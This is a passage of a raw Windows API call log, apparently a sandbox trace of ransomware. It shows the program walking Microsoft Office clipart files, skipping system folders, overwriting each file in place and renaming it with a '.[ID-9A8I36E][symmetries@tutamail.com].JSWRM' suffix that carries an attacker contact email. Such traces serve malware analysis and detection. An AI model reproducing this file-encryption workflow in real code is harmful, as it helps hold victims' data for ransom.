lpFileSize=0x345e890*=7528) returned 1 [0097.272] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d60) returned 0x205850 [0097.273] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d60, lpOverlapped=0x0) returned 1 [0097.350] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.350] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d60, lpOverlapped=0x0) returned 1 [0097.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.350] CloseHandle (hObject=0x314) returned 1 [0097.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0097.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0097.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0097.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0097.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0097.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0097.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.350] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02022_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02022_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02022_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0097.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0097.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.352] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23a8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02024_.WMF", cAlternateFileName="")) returned 1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2=".") returned 1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="..") returned 1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="...") returned 1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="windows") returned -1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="recovery") returned 1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="perflogs") returned 1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="documents and settings") returned 1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="system volume information") returned -1 [0097.352] lstrcmpiW (lpString1="SO02024_.WMF", lpString2="msocache") returned 1 [0097.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0097.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02024_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02024_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02024_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0097.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0097.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02024_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02024_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02024_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0097.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0097.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0097.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02024_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.354] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9128) returned 1 [0097.354] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23a0) returned 0x24d210 [0097.354] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x23a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x23a0, lpOverlapped=0x0) returned 1 [0097.356] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.356] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x23a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x23a0, lpOverlapped=0x0) returned 1 [0097.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.356] CloseHandle (hObject=0x314) returned 1 [0097.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0097.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0097.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0097.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0097.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0097.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0097.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0097.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0097.357] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02024_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02024_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02024_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0097.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0097.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.358] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2016, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02025_.WMF", cAlternateFileName="")) returned 1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2=".") returned 1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="..") returned 1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="...") returned 1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="windows") returned -1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="recovery") returned 1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="perflogs") returned 1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="documents and settings") returned 1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="system volume information") returned -1 [0097.358] lstrcmpiW (lpString1="SO02025_.WMF", lpString2="msocache") returned 1 [0097.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0097.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02025_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02025_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02025_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0097.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02025_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02025_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02025_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0097.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0097.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02025_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.360] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8214) returned 1 [0097.360] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2010) returned 0x205850 [0097.360] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2010, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2010, lpOverlapped=0x0) returned 1 [0097.362] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.362] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2010, lpOverlapped=0x0) returned 1 [0097.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.363] CloseHandle (hObject=0x314) returned 1 [0097.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0097.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0097.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0097.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0097.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0097.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0097.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.363] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02025_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02025_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02025_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0097.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0097.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.364] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24c8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02028_.WMF", cAlternateFileName="")) returned 1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2=".") returned 1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="..") returned 1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="...") returned 1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="windows") returned -1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="recovery") returned 1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="perflogs") returned 1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="documents and settings") returned 1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="system volume information") returned -1 [0097.364] lstrcmpiW (lpString1="SO02028_.WMF", lpString2="msocache") returned 1 [0097.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0097.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02028_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02028_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02028_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0097.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0097.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02028_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02028_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02028_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0097.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0097.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0097.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02028_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02028_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.366] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9416) returned 1 [0097.366] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x24c0) returned 0x24d210 [0097.366] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x24c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x24c0, lpOverlapped=0x0) returned 1 [0097.368] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.368] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x24c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x24c0, lpOverlapped=0x0) returned 1 [0097.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.368] CloseHandle (hObject=0x314) returned 1 [0097.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0097.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.368] 